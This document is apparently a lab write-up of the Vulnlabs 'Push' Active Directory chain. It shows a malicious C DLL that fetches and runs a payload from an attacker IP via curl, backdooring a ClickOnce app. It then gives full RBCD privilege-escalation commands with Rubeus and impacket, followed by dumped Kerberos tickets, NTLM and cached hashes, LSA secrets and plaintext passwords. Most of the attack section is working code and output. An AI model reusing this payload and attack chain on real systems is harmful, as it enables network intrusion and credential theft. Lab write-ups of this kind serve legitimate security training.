Push (Chain)
Machine information

Credentials
olivia.wood
DeployTrust07
Leaked on FTP Service
Domain User
kelly.hill
ShinraTensei!
Found into .git files
Domain User
sccadmin
7ujm&UJM
SCCM Relay Attack
Domain User
✅ Valid Usernames
Administrator
Guest
krbtgt
svcsql
Michelle.Randall
Olivia.Wood
Declan.Hall
Lauren.Saunders
Sharon.Mitchell
Sheila.Stokes
Kathleen.Horton
Melissa.Murray
Amber.Robson
Kelly.Hill
Michelle.Dale
Alice.Young
Allan.Little
Charlotte.Reed
Barry.Murphy
Oliver.Lowe
Charles.Barber
Colin.Brown
Aaron.May
Hilary.Simpson
Leanne.Wilson
Stanley.Sharp
Mohamed.Patel
Ashley.Holden
Lewis.Wood
Bruce.Ali
Danny.Savage
Paige.Finch
Brian.Berry
Connor.James
sccadmin
🔑 Passwords list
DeployTrust07
ShinraTensei!
Password Policy
Minimum password length: 7
Password history length: 24
Maximum password age: 41 days 23 hours 53 minutes
Password Complexity Flags: 000001
Domain Refuse Password Change: 0
Domain Password Store Cleartext: 0
Domain Password Lockout Admins: 0
Domain Password No Clear Change: 0
Domain Password No Anon Change: 0
Domain Password Complex: 1
Minimum password age: 1 day 4 minutes
Reset Account Lockout Counter: 10 minutes
Locked Account Duration: 10 minutes
Account Lockout Threshold: None
Forced Log off Time: Not Set
Information Gathering
DC01.push.Vl
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-12 09:45:12Z)
135/tcp open msrpc Microsoft Windows
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: push.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.push.vl
| Subject Alternative Name: DNS:DC01.push.vl
| Issuer: commonName=DC01.push.vl
443/tcp open ssl/https
|_ssl-date: TLS randomness does not represent time
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=DC01.push.vl
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: DC01.push.vl
| DNS_Tree_Name: push.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-12T09:35:36+00:00
| ssl-cert: Subject: commonName=DC01.push.vl
| Issuer: commonName=DC01.push.vl
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
61236/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61265/tcp open msrpc Microsoft Windows RPC
MS01.push.vl
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-03-23 08:49PM <DIR> .config
| 08-03-23 08:49PM <DIR> .git
|_08-03-23 08:49PM <DIR> dev
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: SelfService
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-10-12T09:36:17+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: MS01.push.vl
| DNS_Tree_Name: push.vl
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service enumeration
DC01
DNS
Not vulnerable to AXFR
SMB
Domain SID: S-1-5-21-1451457175-172047642-1427519037
NetBIOS: DC01
Domain: push.vl
FQDN: DC01.push.vl
SMB signing: true
Server allows null session authentication
HTTP/S
Default IIS website
MS01
FTP
Anonymous FTP login allowed
SMB
SMB signing : false (Vulnerable to NTLM Relay Attacks)
HTTP
ClickOnce is a Microsoft deployment technology that allows Windows-based applications to be installed and run with minimal user interaction—often launched from a URL or shared resource. It supports sandboxing, auto-updating, and limited permission execution, but security often relies heavily on publisher configuration and system policy.

Domain
Not asreproastable users
Not kerberoastable users.
User: olivia.wood
wwwroot folder with Read and Write permission
coerce_plus
VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, PrinterBug
VULNERABLE, MSEven
Spooler service enabled
Not Webdav
Found PKI Enrollment Server: MS01.push.vl
Certificate authority - Found PKI Enrollment Server: MS01.push.vl
LDAP
LDAP Signing NOT Enforced!
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota: 10
Compromise MS01 Server
Download FTP files
❯ wget -m --no-passive ftp://ftp:ftp@MS01.PUSH.VL
File: .git-credentials
--------------------------------------------
https://olivia.wood:DeployTrust07@github.com
Discovering excessive permission on folder
❯ nxc smb MS01 -u 'olivia.wood' -p 'DeployTrust07' --shares
SMB 10.10.230.150 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB 10.10.230.150 445 MS01 [+] push.vl\olivia.wood:DeployTrust07
SMB 10.10.230.150 445 MS01 [*] Enumerated shares
SMB 10.10.230.150 445 MS01 Share Permissions Remark
SMB 10.10.230.150 445 MS01 ----- ----------- ------
SMB 10.10.230.150 445 MS01 ADMIN$ Remote Admin
SMB 10.10.230.150 445 MS01 C$ Default share
SMB 10.10.230.150 445 MS01 IPC$ READ Remote IPC
SMB 10.10.230.150 445 MS01 wwwroot READ,WRITE clickonce application dev share
Abusing ClickOnce to gain initial Access
During the enumeration the tester found a Clickonce application running on MS01. This application in together with the previously user found gave the tester the opportunity to gain initial access into the MS01 Server.
Interesting blog: Backdooring ClickOnce .NET Apps for Initial Access: A Practical Example
Creating the malicious dll payload
To compromise the Clickonce the tester proceeded to create the next DLL as follows:
#include <windows.h>
#include <stdio.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
WinExec("cmd.exe /c curl 10.8.5.48:8081/http-vulnlabs-4444.exe -o C:\\Windows\\Temp\\http-vulnlabs-4444.exe", SW_HIDE);
CreateProcessA(
"C:\\Windows\\Temp\\http-vulnlabs-4444.exe",
NULL,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi
);
}
return TRUE;
}
Compiling DLL on Linux
x86_64-w64-mingw32-gcc -shared -o SelfService.dll.deploy payload.c -lws2_32
Calculating HASH and Size of DLL to manifest file
stat -c%s SelfService.dll.deploy
openssl dgst -binary -sha256 SelfService.dll.deploy | openssl enc -base64
Editing SelfService.dll.manifest
<file name="SelfService.dll" size="SIZE">
<hash>
<dsig:Transforms>
<dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
</dsig:Transforms>
<dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
<dsig:DigestValue>HASH_BASE64</dsig:DigestValue>
</hash>
</file>
Removing signature
and publisherIdentity
tags.
<publisherIdentity ... />
<Signature>...</Signature>
Changing the publicKeyToken
to 0000000000000000
<assemblyIdentity ... publicKeyToken="0000000000000000" ... />
Recalculating the new edited .manifest file
stat -c%s SelfService.dll.manifest
openssl dgst -binary -sha256 SelfService.dll.manifest | openssl enc -base64
Editing SelfService.application
Updating Size
, dsig:DigestValue
, publicKeyToken=0000000000000000
(both) and remove signature
and publisherIdentity
tags.

Discovering kelly.hill's plaintext credentials
sliver (http-vulnlabs-4444) > ls
C:\Users\kelly.hill (31 items, 2.2 MiB)
=======================================
-rw-rw-rw- .git-credential 43 B Sat Aug 05 10:07:54 +0000 2023
<SNIF> <dir> Sat Sep 02 10:20:48 +0000 2023
sliver (http-vulnlabs-4444) > cat .git-credential
https://kelly.hill:ShinraTensei!@github.com
Path 1: Privilege escalation on MS01 via RBCD (Windows)

Abusing Resource Base Constrained Delegation
sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword Password123
[*] Output:
[+] Machine account z3r0 added
sliver (http-vulnlabs-4444) > shell
PS C:\Temp> Import-Module .\PowerView.ps1
PS C:\Temp> $ComputerSid = Get-DomainComputer z3r0 -Properties objectsid | Select -Expand objectsid
PS C:\Temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\Temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Temp> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Temp> $credentials = New-Object System.Management.Automation.PSCredential "PUSH\kelly.hill", (ConvertTo-SecureString "ShinraTensei!" -AsPlainText -Force)
PS C:\Temp> Get-DomainComputer MS01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'PUSH' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.push.vl/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Extracted domain 'push.vl' from 'CN=MS01,CN=Computers,DC=push,DC=vl'
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.PUSH.VL/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=CN=MS01,CN=Computers,DC=push,DC=vl)))
VERBOSE: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0
36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 151 122 131 86
26 61 65 10 61 54 22 85 18 14 0 0' for object 'MS01$'
Requesting TGS using S4U to impersonate Administrator
sliver (http-vulnlabs-4444) > rubeus s4u /user:z3r0$ /impersonateuser:administrator /msdsspn:cifs/MS01.push.vl /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /outfile:administrator
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'push.vl\z3r0$'
[*] Using domain controller: 10.10.166.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFHjCCBRqgAwIBBaEDAgEWooIERTCCBEFhggQ9MIIEOaADAgEFoQkbB1BVU0guVkyiHDAaoAMCAQKh
EzARGwZrcmJ0Z3QbB3B1c2gudmyjggQHMIIEA6ADAgESoQMCAQKiggP1BIID8XJ9n/CzgAurmnc+Dyo5
yQp5wWDkBhaNYz0qWGKz4fuv9enG//t7YZEbP3dmVICd8Ibay91pyWzA7NSQZoRo1y1EWmsOnSqNoK4d
JqkLt4DumjEEUUq01Sa2z1XXn+wYfSVM7bJwYq5ruj+LbdlBIuTgpBj8Cr8cWDHImyPDCm19pmEd0BZN
EN1ZfUq7RcLbTPkSV0LBahZgXmRfZ3tRa319sG6GsP6ptc9DO3SpTdD9SL48gSKTDhGGvDOofa3v/hez
68hgIDdmRaXfC1j+0vfk6nCJcpBkBG2Y1pX+nrAC9wSnwrWc6vJF5G/mOxuUCC3woYVzjfBRCTKzuBln
J6ndm3fTqCRpE7GYFk2cVZW+MR+rLwdqy2nPaZjObDOk0cxYfwgJYB8nYgplXvSX3GzkYS8e7KM4CIIG
mNh00mEmGbc2wRVcvTObXqaIDxUL5YRo0w6lsvm4pKmo+RpFuHwaKZN12S38El2x6mzBgJBijWNtGdq/
Hwe6BDe0o12QeocQJl1L+VzIczsWCdbBHJq7AcYVIZaH0PcwEVL2KWg3RTXXdrhE4HljKHxuOfE+E9nI
LZKPmwALhtvzySW7QCK7VQCUQcL2hTqpctnUiXNPnXdtPV0xEYbQ3/rerTTnKbVTbW6PhB8C37gU6Wzf
amT4VHZlom9JsMkPSWXlwzFdKOzyBjVRMFtCQwhhIZYr5pMJ++YbNNyKv8424YbG7WliJRBNoY+8ft9R
2c42XMIVNHLxrMOMYbS1U2iv0UtC7Vjl+apIhwhfyn64zjpRDp9VhjHb2PhuH4dZiOQ9HUP2j+TjYidH
aYg35Bn3VDZy0CYMZxhMOrrcRnUvjQu0v97DzU7tLE2ZExeuxUOQhL+RRwQFlm9nq6aiH/SYI5dLzRQo
sB0Z2mdptldRw+bfYE5xFkmrNuIJybf1EfQ9Imro+N3v2kslbQfY1ayykgZl95JQ2xva/5N2qv0hokKQ
ICKKcX2aQ9eLu/Y1DQp4aQ8QvJT5s9yYR+UHKkuerRtn+/0QvdjAyEqLsIPhzp4byr/Bi/G33YcQUPt5
O7JR6o/1fwgY6J8yS/Dr6qoIWD8ZGRU/kKbQtsRipQG8KGqPiyqtNRQOzulU1a07QgJXI6kJcq5uPTtW
6TzRs7VJ2sYdbqGRu6BRH0RjbA1+4EgPGf2uYmueOLiZUh60QFD6ImFPD5CzS+QrFe2BbyKOySb0eYQn
P7D2NcPAabvyD4Xj01N4JvtH+VjGY+Imbt4mtqsVuqjut8kBwuo74DoOqMvhZ/7qoR13G5vetpaXeBwv
f/6h2cisVjiuZN3AoN8YbHRDmzfmKC1cveAcKYU2T0kxgxajgcQwgcGgAwIBAKKBuQSBtn2BszCBsKCB
rTCBqjCBp6AbMBmgAwIBF6ESBBAZPVwcrAVWoh3ahau8lJ87oQkbB1BVU0guVkyiEjAQoAMCAQGhCTAH
GwV6M3IwJKMHAwUAQOEAAKURGA8yMDI1MDUxMjA2MDI0OVqmERgPMjAyNTA1MTIxNjAyNDlapxEYDzIw
MjUwNTE5MDYwMjQ5WqgJGwdQVVNILlZMqRwwGqADAgECoRMwERsGa3JidGd0GwdwdXNoLnZs
[*] Action: S4U
[*] Building S4U2self request for: 'z3r0$@PUSH.VL'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2self request to 10.10.166.229:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'z3r0$@PUSH.VL'
[*] base64(ticket.kirbi):
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
[*] Impersonating user 'administrator' to target SPN 'cifs/MS01.push.vl'
[*] Building S4U2proxy request for service: 'cifs/MS01.push.vl'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2proxy request to domain controller 10.10.166.229:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/MS01.push.vl':
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
TVMwMS5wdXNoLnZs
[*] Ticket written to administrator_cifs_MS01.push.vl
[+] Ticket successfully imported!
liver (http-vulnlabs-4444) > download administrator_cifs_MS01.push.vl
[*] Wrote 1632 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/administrator_cifs_MS01.push.vl
Dumping SAM database and LSA Secrets
❯ impacket-ticketConverter admin2.kirbi admin2.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
❯ KRB5CCNAME=admin2.ccache impacket-secretsdump -k MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Path 1: Privilege escalation on MS01 via RBCD (Linux)
Creating Computer Account
❯ impacket-addcomputer 'push.vl/kelly.hill:ShinraTensei!' -computer-name 'Intrusion' -computer-pass 'Password123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account Intrusion$ with password Password123.
Writing msds-allowedtoactonbehalfofotheridentity attribute to MS01
❯ impacket-rbcd -delegate-from Intrusion$ -delegate-to MS01$ -action write 'push.vl/kelly.hill:ShinraTensei!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] z3r0$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Delegation rights modified successfully!
[*] Intrusion$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] z3r0$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Intrusion$ (S-1-5-21-1451457175-172047642-1427519037-3603)
Requesting Ticket TGS to impersonate Administrator
❯ impacket-getST 'push.vl/Intrusion$:Password123' -spn 'CIFS/MS01.PUSH.VL' -impersonate Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache
Dumping SAM database and LSA Secrets
❯ KRB5CCNAME='Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache' impacket-secretsdump -k -no-pass MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
